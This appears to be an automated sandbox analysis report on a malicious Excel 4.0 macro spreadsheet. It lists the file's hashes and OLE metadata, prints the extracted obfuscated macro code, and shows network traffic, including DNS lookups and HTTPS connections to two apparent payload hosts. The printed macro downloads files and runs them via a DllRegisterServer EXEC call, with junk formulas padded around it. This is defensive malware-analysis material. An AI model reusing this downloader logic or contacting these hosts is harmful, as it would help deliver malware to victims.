                                                                                                                                                                                      File name:afdab907_by_Libranalysis.xls
                                                                                                                                                                                      File size:375808
                                                                                                                                                                                      MD5:afdab90737c55a669e7025df2fa86efe
                                                                                                                                                                                      SHA1:39a056a263368dcb1fb98a2226eae7c9d1488453
                                                                                                                                                                                      SHA256:d61e90fe268528db7a0eee66f064270a519b2843a59642923b137ec2b81fe5e2
                                                                                                                                                                                      SHA512:473d272a8270022f8a53a96ca3156aa88f751b9943264949452e3847c529af7e05cad24ee0c02a236b4e67dfa515edf0a70a3bffd5c413849add24dd72675d71
                                                                                                                                                                                      SSDEEP:3072:Q8UGHv2tt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/I/T/tbHm7H9G4l+s2k3zN4sbc5:vUGAt6Uqa5DPdG9uS9QLp4l+s+E8
                                                                                                                                                                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                                      File Icon

                                                                                                                                                                                      Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                                                      Static OLE Info

                                                                                                                                                                                      General

                                                                                                                                                                                      Document Type:OLE
                                                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                                                      OLE File "afdab907_by_Libranalysis.xls"

                                                                                                                                                                                      Indicators

                                                                                                                                                                                      Has Summary Info:True
                                                                                                                                                                                      Application Name:Microsoft Excel
                                                                                                                                                                                      Encrypted Document:False
                                                                                                                                                                                      Contains Word Document Stream:False
                                                                                                                                                                                      Contains Workbook/Book Stream:True
                                                                                                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                                                                                                      Contains Visio Document Stream:False
                                                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                                                      Flash Objects Count:
                                                                                                                                                                                      Contains VBA Macros:True

                                                                                                                                                                                      Summary

                                                                                                                                                                                      Code Page:1251
                                                                                                                                                                                      Author:van-van
                                                                                                                                                                                      Last Saved By:vi-vi
                                                                                                                                                                                      Create Time:2006-09-16 00:00:00
                                                                                                                                                                                      Last Saved Time:2021-05-12 07:24:11
                                                                                                                                                                                      Creating Application:Microsoft Excel
                                                                                                                                                                                      Security:0

                                                                                                                                                                                      Document Summary

                                                                                                                                                                                      Document Code Page:1251
                                                                                                                                                                                      Thumbnail Scaling Desired:False
                                                                                                                                                                                      Contains Dirty Links:False

                                                                                                                                                                                      Streams

                                                                                                                                                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Stream Size:4096
                                                                                                                                                                                      Entropy:0.287037498961
                                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                                                                                                                                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:\x5SummaryInformation
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Stream Size:4096
                                                                                                                                                                                      Entropy:0.290777742057
                                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . v i - v i . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                                                                                                                                      Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 363283
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:Book
                                                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 8
                                                                                                                                                                                      Stream Size:363283
                                                                                                                                                                                      Entropy:3.24522262131
                                                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                                                      Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . v i - v i B . . . . . . . . . . . . . . . . . . . . . . . D o c 3 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
                                                                                                                                                                                      Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 05 76 69 2d 76 69 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                                                      CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21)=RUN(Doc4!AM6)
                                                                                                                                                                                      
                                                                                                                                                                                      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ39&BA39&before.3.5.0.sheet!BB39&before.3.5.0.sheet!BC39,before.3.5.0.sheet!AU13)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ40&BA40&before.3.5.0.sheet!BB40&before.3.5.0.sheet!BC40,before.3.5.0.sheet!AU14)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(""U""&before.3.5.0.sheet!BC25&before.3.5.0.sheet!BC29&before.3.5.0.sheet!BF28&before.3.5.0.sheet!BC28&before.3.5.0.sheet!BC31&before.3.5.0.sheet!BF29&""A"",before.3.5.0.she
                                                                                                                                                                                      "=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&""1"",0,!AL21)=RUN(Doc4!AM6)"
                                                                                                                                                                                      "=MDETERM(56241452475)=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC17&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC18&""1""&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=RUN(Doc3!AY22)"

                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                      May 12, 2021 15:47:22.094558954 CEST49711443192.168.2.5192.185.39.58
                                                                                                                                                                                      May 12, 2021 15:47:22.252940893 CEST44349711192.185.39.58192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:22.253099918 CEST49711443192.168.2.5192.185.39.58
                                                                                                                                                                                      May 12, 2021 15:47:22.254065990 CEST49711443192.168.2.5192.185.39.58
                                                                                                                                                                                      May 12, 2021 15:47:22.412190914 CEST44349711192.185.39.58192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:22.417032957 CEST44349711192.185.39.58192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:22.417074919 CEST44349711192.185.39.58192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:22.417090893 CEST44349711192.185.39.58192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:22.417165995 CEST49711443192.168.2.5192.185.39.58
                                                                                                                                                                                      May 12, 2021 15:47:22.417207956 CEST49711443192.168.2.5192.185.39.58
                                                                                                                                                                                      May 12, 2021 15:47:22.432792902 CEST49711443192.168.2.5192.185.39.58
                                                                                                                                                                                      May 12, 2021 15:47:22.591176033 CEST44349711192.185.39.58192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:22.591352940 CEST49711443192.168.2.5192.185.39.58
                                                                                                                                                                                      May 12, 2021 15:47:22.592217922 CEST49711443192.168.2.5192.185.39.58
                                                                                                                                                                                      May 12, 2021 15:47:22.790319920 CEST44349711192.185.39.58192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:22.939877987 CEST44349711192.185.39.58192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:22.939956903 CEST44349711192.185.39.58192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:22.940431118 CEST49711443192.168.2.5192.185.39.58
                                                                                                                                                                                      May 12, 2021 15:47:22.940607071 CEST49711443192.168.2.5192.185.39.58
                                                                                                                                                                                      May 12, 2021 15:47:23.018281937 CEST49713443192.168.2.5192.185.32.232
                                                                                                                                                                                      May 12, 2021 15:47:23.100251913 CEST44349711192.185.39.58192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:23.178111076 CEST44349713192.185.32.232192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:23.178352118 CEST49713443192.168.2.5192.185.32.232
                                                                                                                                                                                      May 12, 2021 15:47:23.179344893 CEST49713443192.168.2.5192.185.32.232
                                                                                                                                                                                      May 12, 2021 15:47:23.337299109 CEST44349713192.185.32.232192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:23.340958118 CEST44349713192.185.32.232192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:23.340984106 CEST44349713192.185.32.232192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:23.341016054 CEST44349713192.185.32.232192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:23.341029882 CEST49713443192.168.2.5192.185.32.232
                                                                                                                                                                                      May 12, 2021 15:47:23.341061115 CEST49713443192.168.2.5192.185.32.232
                                                                                                                                                                                      May 12, 2021 15:47:23.341069937 CEST49713443192.168.2.5192.185.32.232
                                                                                                                                                                                      May 12, 2021 15:47:23.351911068 CEST49713443192.168.2.5192.185.32.232
                                                                                                                                                                                      May 12, 2021 15:47:23.513669014 CEST44349713192.185.32.232192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:23.514003992 CEST49713443192.168.2.5192.185.32.232
                                                                                                                                                                                      May 12, 2021 15:47:23.514883995 CEST49713443192.168.2.5192.185.32.232
                                                                                                                                                                                      May 12, 2021 15:47:23.714240074 CEST44349713192.185.32.232192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:24.155618906 CEST44349713192.185.32.232192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:24.155705929 CEST49713443192.168.2.5192.185.32.232
                                                                                                                                                                                      May 12, 2021 15:47:24.157721043 CEST44349713192.185.32.232192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:24.157780886 CEST49713443192.168.2.5192.185.32.232
                                                                                                                                                                                      May 12, 2021 15:47:54.258362055 CEST44349713192.185.32.232192.168.2.5

                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                      May 12, 2021 15:47:03.413523912 CEST6180553192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:03.471903086 CEST53618058.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:03.705459118 CEST5479553192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:03.754215956 CEST53547958.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:04.021063089 CEST4955753192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:04.078269958 CEST53495578.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:04.623739004 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:04.674660921 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:08.543668032 CEST6544753192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:08.592654943 CEST53654478.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:09.659068108 CEST5244153192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:09.710345030 CEST53524418.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:10.516228914 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:10.564907074 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:16.428579092 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:16.479599953 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:17.659923077 CEST6529653192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:17.720165014 CEST53652968.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:18.232724905 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:18.308336973 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:19.243283033 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:19.386851072 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:19.551693916 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:19.603414059 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:20.243480921 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:20.313589096 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:22.035557032 CEST5696953192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:22.092592955 CEST53569698.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:22.156959057 CEST5516153192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:22.208632946 CEST53551618.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:22.290174007 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:22.348793030 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:22.956770897 CEST5475753192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:23.015825033 CEST53547578.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:23.018431902 CEST4999253192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:23.080650091 CEST53499928.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:24.021214008 CEST6007553192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:24.081850052 CEST53600758.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:26.348236084 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:26.407639027 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:30.405853987 CEST5501653192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:30.466262102 CEST53550168.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:36.337146044 CEST6434553192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:36.397433996 CEST53643458.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:47:59.230962992 CEST5712853192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:47:59.292073965 CEST53571288.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:48:20.628226042 CEST5479153192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:48:20.687875986 CEST53547918.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:48:37.164531946 CEST5046353192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:48:37.226322889 CEST53504638.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:49:09.811649084 CEST5039453192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:49:09.919673920 CEST53503948.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:49:10.552314043 CEST5853053192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:49:10.611828089 CEST53585308.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:49:11.260902882 CEST5381353192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:49:11.320790052 CEST53538138.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:49:11.760792971 CEST6373253192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:49:11.831677914 CEST5734453192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:49:11.867418051 CEST53637328.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:49:11.906768084 CEST53573448.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:49:12.406383038 CEST5445053192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:49:12.463428974 CEST53544508.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:49:13.062417030 CEST5926153192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:49:13.119376898 CEST53592618.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:49:13.585719109 CEST5715153192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:49:13.645715952 CEST53571518.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:49:14.483455896 CEST5941353192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:49:14.540940046 CEST53594138.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:49:15.337685108 CEST6051653192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:49:15.389159918 CEST53605168.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:49:15.845644951 CEST5164953192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:49:16.053854942 CEST53516498.8.8.8192.168.2.5
                                                                                                                                                                                      May 12, 2021 15:49:31.827629089 CEST6508653192.168.2.58.8.8.8
                                                                                                                                                                                      May 12, 2021 15:49:31.906748056 CEST53650868.8.8.8192.168.2.5

                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                      May 12, 2021 15:47:22.035557032 CEST192.168.2.58.8.8.80x8b1bStandard query (0)signifysystem.comA (IP address)IN (0x0001)
                                                                                                                                                                                      May 12, 2021 15:47:22.956770897 CEST192.168.2.58.8.8.80xccf0Standard query (0)fcventasyservicios.clA (IP address)IN (0x0001)

                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                      May 12, 2021 15:47:22.092592955 CEST8.8.8.8192.168.2.50x8b1bNo error (0)signifysystem.com192.185.39.58A (IP address)IN (0x0001)
                                                                                                                                                                                      May 12, 2021 15:47:23.015825033 CEST8.8.8.8192.168.2.50xccf0No error (0)fcventasyservicios.cl192.185.32.232A (IP address)IN (0x0001)

                                                                                                                                                                                      HTTPS Packets

                                                                                                                                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                      May 12, 2021 15:47:22.417090893 CEST192.185.39.58443192.168.2.549711CN=cpcontacts.signifysystem.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Apr 01 17:00:25 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Wed Jun 30 17:00:25 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                      CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                                                      May 12, 2021 15:47:23.341016054 CEST192.185.32.232443192.168.2.549713CN=mail.fcventasyservicios.cl CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Mar 16 13:01:12 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon Jun 14 14:01:12 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                      CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                                                      Code Manipulations

                                                                                                                                                                                      Statistics

                                                                                                                                                                                      Behavior

                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                      System Behavior

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:15:47:15
                                                                                                                                                                                      Start date:12/05/2021
                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                      Imagebase:0x3a0000
                                                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:15:47:23
